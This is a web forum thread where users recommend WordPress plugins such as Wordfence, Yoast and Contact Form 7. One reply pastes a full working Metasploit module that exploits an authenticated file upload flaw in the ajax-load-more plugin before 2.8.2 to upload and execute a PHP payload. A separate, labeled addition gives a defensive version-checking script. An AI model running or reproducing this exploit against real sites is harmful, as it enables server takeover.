What are your favorite Wordpress Plugins?

aceofadsense

Member
Registered
Joined
Jan 22, 2013
Messages
51
Points
0
Are you running a blog on WordPress CMS? What are your favorite WordPress plugins that you would recommend for better blogging?
 

SIG

Member
Registered
Joined
Oct 16, 2015
Messages
54
Points
0
My favorite WordPress plugins are:

  1. WordFence (Security plugin) - very important plugin.
  2. Jetpack (by WordPress) - good for viewing visitors, search terms, what visitors clicked on, where they came from, etc. - It also comes with a bunch of handy features.
  3. WPSmush - to reduce image sizes - good for speeding up your blog/site a little bit.
  4. Contact form 7 - good contact form creator.


That is about it.
 

Hugo E.

Member
Registered
Joined
Sep 8, 2014
Messages
62
Points
0
In my personal opinion, WP is already secure, so why do you need a security plugin for it? It's weird.
 

SIG

Member
Registered
Joined
Oct 16, 2015
Messages
54
Points
0
WordPress has vulnerabilities, and can be hacked. And I can prove it.

This is the most recent one:
WordPress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability

Discovered on: 2015-10-18

Going off-topic with this:
Code:
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
   
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
   
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
          ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
     
    register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
   
  def user
    datastore['WP_USER']
  end
   
  def password
    datastore['WP_PASSWORD']
  end
   
  def check
    # Check plugin version
    ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
    if ver
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
   
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
     
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
     
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end
 
    print_status("#{peer} - Trying to upload payload")
     
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
     
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
     
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
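
A defender-side version check for the plugin named in the advisory above, added here as an example (it is not part of SIG's post or of the Metasploit module). It assumes the installed plugin's readme.txt carries a `Stable tag:` line; the function names and the sample readme are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Fixed version taken from the advisory title on this page ("< 2.8.2").
FIXED_VERSIONS = {"ajax-load-more": "2.8.2"}

# Assumption: the installed readme.txt has a "Stable tag: x.y.z" header line.
STABLE_TAG = re.compile(r"^\s*Stable tag:\s*(\d+(?:\.\d+)*)\s*$", re.I | re.M)


def is_older(installed, fixed):
    """Compare dotted versions numerically, so 2.10 is newer than 2.8.2."""
    a = [int(p) for p in installed.split(".")]
    b = [int(p) for p in fixed.split(".")]
    width = max(len(a), len(b))
    a += [0] * (width - len(a))
    b += [0] * (width - len(b))
    return a < b


def audit_plugins(plugins_dir, fixed_versions=FIXED_VERSIONS):
    """Return (slug, installed_version, status) for each listed plugin found."""
    findings = []
    for slug, fixed in sorted(fixed_versions.items()):
        readme = Path(plugins_dir) / slug / "readme.txt"
        if not readme.is_file():
            continue  # plugin not installed
        match = STABLE_TAG.search(readme.read_text(errors="replace"))
        if match is None:
            # e.g. "Stable tag: trunk": cannot decide, flag for manual review
            findings.append((slug, None, "unknown"))
        elif is_older(match.group(1), fixed):
            findings.append((slug, match.group(1), "update required"))
        else:
            findings.append((slug, match.group(1), "ok"))
    return findings


def demo(stable_tag="2.7.3"):
    """Run the audit against a constructed plugins directory."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp) / "ajax-load-more"
        plugin.mkdir()
        (plugin / "readme.txt").write_text(
            "=== Ajax Load More ===\nStable tag: %s\n" % stable_tag)
        return audit_plugins(tmp)
```

Point `audit_plugins` at a site's `wp-content/plugins` directory and extend `FIXED_VERSIONS` with other advisories you track.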
 

SenseiSteve

Web Hosting Sensei
Hosting Provider
Registered
Joined
Nov 11, 2015
Messages
273
Points
28
SEO by Yoast
WordFence
Contact Form 7
WP Edit

And yes, WordPress sites get hacked all the time. Keeping your themes and plugins up to date helps, but make sure you download plugins from authority sites and ensure they stay up to date with the current version of WordPress.
 

ulterios

Well-known member
Registered
Joined
Nov 25, 2015
Messages
481
Points
0
It all depends on the site in some cases, but in general here are my favorites:

WordFence Security - Lots of good features and has a cache option which actually works real well

Slider Captcha - Keeps bots from trying to log in to my site as well as eliminating spam

Google Analytics Dashboard for WP - To keep track of traffic and visitors

All In One SEO Pack - A lot of good stuff to make some SEO tasks easier.
 

Ron Killian

Well-known member
Registered
Joined
Dec 3, 2015
Messages
363
Points
0
I agree Wordpress can be hacked. Anything can be hacked. Though most people who own wordpress have NO clue how many times each day people (bots) try to break in. Until you have a good security plugin, then you see what the bad guys are trying to do.

I put in another vote for Wordfence, great plugin.

Tried several image compression plugins, but best I found was Kraken. Works great.

Also like Intense WordPress plugin. Tons of shortcodes to dress up my content very nicely.

Disqus for comments.

As Ulterios said, Google analytics dashboard is nice.

MCE table button, gotta have tables.

Premium SEO pack - for obvious reasons.

Q2W3 Fixed Widget - Fixes widgets you want to stay in the sidebar as people scroll.

Simple Page Sidebars - Make custom sidebars on any post or page.

Uber Menu for better menus, bigger, etc.

Wp Author Box - Much better author box.

WP Ad Pro to rotate ads and banners, track ad stats.

Just started using Zendesk for support. Think I like it. Can't say 100% yet. But there are not many good support plugins out there.

Woocommerce and many related plug-ins for it.
 

dnapick

New member
Registered
Joined
Jan 22, 2016
Messages
2
Points
0
It depends on the project, but I always use:

SEO by Yoast
Custom CSS
WP Super Cache
 